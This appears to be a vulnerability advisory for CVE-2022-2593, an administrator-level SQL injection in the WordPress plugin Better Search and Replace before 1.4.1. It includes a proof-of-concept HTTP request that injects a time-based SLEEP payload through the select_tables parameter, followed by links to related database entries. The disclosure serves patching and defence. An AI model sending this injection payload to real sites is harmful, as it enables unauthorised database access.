Lucene search
Christiaan SwiersWPEX-ID:229A065E-1062-44D4-818D-29AA3B6B6D41HistoryAug 01, 2022 - 12:00 a.m.
Better Search and Replace < 1.4.1 - Admin+ SQLi
2022-08-0100:00:00
Christiaan Swiers
92
0.001 Low
EPSS
Percentile
32.2%
The plugin does not properly sanitise and escape table data before inserting it into a SQL query, which could allow high privilege users to perform SQL Injection attacks
POST /wp-admin/tools.php?page=better-search-replace&bsr-ajax=process_search_replace HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 369
Connection: close
Cookie:[admin+]
bsr_ajax_nonce=3c38e50368&action=process_search_replace&bsr_step=0&bsr_page=0&bsr_data=search_for%3Daaa%26replace_with%3Dcef%26select_tables%255B%255D%3Dwp_posts%60%20WHERE%201=SLEEP(1)%20--%20%26dry_run%3Don%26bsr_nonce%3Da66e81c52b%26_wp_http_referer%3D%252Fwordpress%252Fwp-admin%252Ftools.php%253Fpage%253Dbetter-search-replace%26action%3Dbsr_process_search_replaceRelated
wpvulndb
wpvulndb
Better Search and Replace < 1.4.1 - Admin+ SQLi
2022-08-01 00:00:00
nvd
nvd
CVE-2022-2593
2022-08-22 15:15:15
prion
prion
Sql injection
2022-08-22 15:15:00
cvelist
cvelist
CVE-2022-2593 Better Search and Replace < 1.4.1 - Admin+ SQLi
2022-08-22 15:04:52
cve
cve
CVE-2022-2593
2022-08-22 15:15:15
openvas
openvas
WordPress Better Search Replace Plugin < 1.4.1 SQLi Vulnerability
2023-07-31 00:00:00
patchstack
patchstack